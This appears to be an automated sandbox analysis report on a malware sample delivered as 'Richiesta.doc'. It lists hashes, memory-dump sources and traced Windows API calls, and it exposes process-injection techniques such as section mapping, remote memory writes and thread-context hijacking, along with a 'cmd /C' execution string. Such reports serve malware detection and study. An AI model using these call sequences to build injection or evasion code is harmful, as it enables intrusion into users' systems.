  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: StrToIntExmemcpy
  • String ID: 0x
  • API String ID: 149130431-3225541890
  • Opcode ID: da5bbc278911b085aa6d66a47a0cf6d216f6515775abb5fb592028d0f4abd24f
  • Instruction ID: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
  • Opcode Fuzzy Hash: B3D0A750AA2F8381152564850252B35F667F8A2B537CC9F525E00D716A2F52B7762F0B
  • Instruction Fuzzy Hash: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
APIs
  • memcpy.NTDLL(?,?,?), ref: 001C7E65
  • StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001C7E77
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 79
  • API ID: CloseHandleGetLastErrorHeapFreememset
  • String ID:
  • API String ID: 1419005916-0
  • Opcode ID: 760449bbfbed289788199d7c06102e71ba99187f66d499b3f37ec5349a85ff82
  • Instruction ID: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
  • Opcode Fuzzy Hash: 4C1189C5015BD382E6772E01A8A0F60D2429F86B76E4EA731C4BF745DE3D802024B776
  • Instruction Fuzzy Hash: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
APIs
    • Part of subcall function 001C24B7: lstrlen.KERNEL32(001C2246,?,00000000,00000000,001C2B9B,00000000,001C2246,?,00000000,?), ref: 001C24C1
    • Part of subcall function 001C24B7: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C24D6
    • Part of subcall function 001C24B7: HeapFree.KERNEL32(00000000,00000000,001C71E8), ref: 001C251D
  • memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
  • CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2A39: RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C2A39: CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C164D: RtlImageNtHeader.NTDLL(?), ref: 001C165E
    • Part of subcall function 001C164D: RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
    • Part of subcall function 001C164D: GetTickCount.KERNEL32 ref: 001C169C
    • Part of subcall function 001C164D: wsprintfA.USER32 ref: 001C16AC
    • Part of subcall function 001C164D: RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
    • Part of subcall function 001C164D: StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
    • Part of subcall function 001C164D: lstrlen.KERNEL32(00000000), ref: 001C1702
    • Part of subcall function 001C164D: RegCloseKey.ADVAPI32(?), ref: 001C171E
    • Part of subcall function 001C164D: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
    • Part of subcall function 001C1A08: RtlImageNtHeader.NTDLL ref: 001C1A48
    • Part of subcall function 001C1A08: GetCurrentThreadId.KERNEL32 ref: 001C1A5E
    • Part of subcall function 001C1A08: GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
    • Part of subcall function 001C1A08: RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
    • Part of subcall function 001C1A08: wsprintfA.USER32 ref: 001C1B50
    • Part of subcall function 001C1A08: lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
    • Part of subcall function 001C1586: RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
    • Part of subcall function 001C1586: GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
    • Part of subcall function 001C1586: StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
    • Part of subcall function 001C1586: wsprintfA.USER32 ref: 001C15D0
    • Part of subcall function 001C1586: CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
    • Part of subcall function 001C1586: GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
    • Part of subcall function 001C1586: WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
    • Part of subcall function 001C1586: GetLastError.KERNEL32 ref: 001C1615
    • Part of subcall function 001C1586: CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C1586: GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
    • Part of subcall function 001C1586: HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
    • Part of subcall function 001CB8EF: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 001CB919
    • Part of subcall function 001CB8EF: HeapFree.KERNEL32(00000000,00000000), ref: 001CB968
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C1E86: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
    • Part of subcall function 001C1E86: RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001C1E86: lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001C1E86: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001C1EFC: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1F04
    • Part of subcall function 001C2416: lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
    • Part of subcall function 001C2416: RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
    • Part of subcall function 001C2416: lstrcpy.KERNEL32(00000008,?), ref: 001C2462
    • Part of subcall function 001C2416: CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
    • Part of subcall function 001C2416: CloseHandle.KERNEL32(00000000), ref: 001C2485
    • Part of subcall function 001C2416: GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
    • Part of subcall function 001C2416: HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
  • GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
    • Part of subcall function 001C1473: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001C1473: wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001C1473: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

General

Root Process Name:d3d8sext.exe
Process MD5:AD7B9C14083B52BC532FBA5948342B98
Total matches:133
Initial Analysis Report:Open
Initial sample Analysis ID:55548
Initial sample SHA 256:15C3BD749EEBAB76A5BD75245AF4ECC8B066E8D767A4A91D2AC8209A13D2D33B
Initial sample name:Richiesta.doc

Similar Executed Functions

Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 57d5b69842fa9f20cc0ac7374aaf72f9f3e4042206c472131978e9752df15512
  • Instruction ID: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
  • Opcode Fuzzy Hash: 09F078400B9F90E6E812A68604A2F406692FF06E75E0EE32475F211B8A3F12311D8B06
  • Instruction Fuzzy Hash: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
APIs
  • memset.NTDLL ref: 01B338A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 01B33995
    • Part of subcall function 01B33E68: NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
    • Part of subcall function 01B33E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
    • Part of subcall function 01B33E68: SetLastError.KERNEL32(00000000), ref: 01B33EA7
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
  • memcpy.NTDLL(00000218,01B34F92,00000100,?,00010003,?,?,00000318,00000008), ref: 01B3391D
    • Part of subcall function 01B33E27: NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
    • Part of subcall function 01B33E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
    • Part of subcall function 01B33E27: SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 01B33974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33977
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 09b8888f5fea2438ba07c33a5d99fafd9b808ca60c6c542fde1a50af119b8c2c
  • Instruction ID: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
  • Opcode Fuzzy Hash: 42C012800D5D81E6957F54890169A165197BB91600C3D73363184AD5807FA032190F09
  • Instruction Fuzzy Hash: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
APIs
  • NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
  • SetLastError.KERNEL32(00000000), ref: 01B33EA7
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: 153371e7e4f27683f8f1e7324a073917f20e70acda51c493c57c8daf0af629c8
  • Instruction ID: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
  • Opcode Fuzzy Hash: 09C09BC7021DC54DD779698201B5C45C1C57EB177243C710D5054DD31D518931274E85
  • Instruction Fuzzy Hash: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
  • SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 36b500c4af3d78682ecbfd6e0cb23a776f8586d0295add1c103b4d2a2a554bea
  • Instruction ID: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
  • Opcode Fuzzy Hash: 9EC09B87020DC54DD779694101B9C45C0C57FB177243C710D5058DD31D518931274F85
  • Instruction Fuzzy Hash: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
  • SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 31
  • API ID: CreateEventGetLastErrorInterlockedDecrementOpenEventRtlExitUserThreadWaitForMultipleObjects
  • String ID:
  • API String ID: 420885392-0
  • Opcode ID: d33af0a5ccd8da24651d90541fd71a469b169468326c88d3ba2cd7f680d024ee
  • Instruction ID: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
  • Opcode Fuzzy Hash: 38E02B3406094157223F70A4A211B7F4ED8F8872C268D638BFC283D2AD5A0791E62557
  • Instruction Fuzzy Hash: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
APIs
  • OpenEventA.KERNEL32(00100000,00000000), ref: 001CD1A0
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001CD1BB
  • GetLastError.KERNEL32 ref: 001CD1C8
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CD1EB
  • InterlockedDecrement.KERNEL32(001EAF4C), ref: 001CD217
    • Part of subcall function 001C13D6: SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001C13D6: CloseHandle.KERNEL32(001EB094), ref: 001C13F5
    • Part of subcall function 001C13D6: HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
  • RtlExitUserThread.NTDLL(00000000), ref: 001CD22E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 97
  • API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2510858262-0
  • Opcode ID: 79e378e90741fe03a1868ff575f465e1dcc9b1d4b7d085768b56240e49bf8d92
  • Instruction ID: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
  • Opcode Fuzzy Hash: B2019C28149E95B7D43BB0841C52EC1C254BB53294C1D6372E892241C73F007709BB19
  • Instruction Fuzzy Hash: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
APIs
    • Part of subcall function 001D75AC: GetLastError.KERNEL32(00000024,?,001D7807,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?,?,00000000,001E5050,00000000), ref: 001D75D9
    • Part of subcall function 001D9FF2: lstrcmpi.KERNEL32(?,00000000), ref: 001DA027
  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?), ref: 001D7865
  • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,001CB2EF), ref: 001D789F
  • RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D78E5
    • Part of subcall function 001D7646: lstrlen.KERNEL32(00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7678
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7692
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D76C5
  • RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D78C7
  • GetLastError.KERNEL32(?,001CB2EF), ref: 001D78FA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DA098: lstrcmpi.KERNEL32(?,00000000), ref: 001DA0DC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 334b4ad23c3ebcab69ace51bbaeeff1e78eacdd0a0d3c55371ac3bd1638c0514
  • Instruction ID: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
  • Opcode Fuzzy Hash: 4CD05EF84B9C968B402B7450581D36CA586B9D12C5ACC3663F326A685EAB11B3D0477A
  • Instruction Fuzzy Hash: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
APIs
  • GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
  • GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
  • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
  • CloseHandle.KERNEL32(00000000), ref: 001D8391
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 38
  • API ID: RegCloseKeyRegQueryValueExwsprintf
  • String ID: Client
  • API String ID: 1809512201-3236430179
  • Opcode ID: 9042b19d19dd4b3d942996e0d3ea8ecf2d3d2b777e835d7718659b5b290a5e22
  • Instruction ID: bd4461f6c7afc55672d071394b4a111d53588a956b6005c1a3bb12a79494774e
  • Opcode Fuzzy Hash: 8CF04634A804C58A8693A885092A7FC4571B352AEECCCBF20F15852181FFC977D73B11
  • Instruction Fuzzy Hash: bd4461f6c7afc55672d071394b4a111d53588a956b6005c1a3bb12a79494774e
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
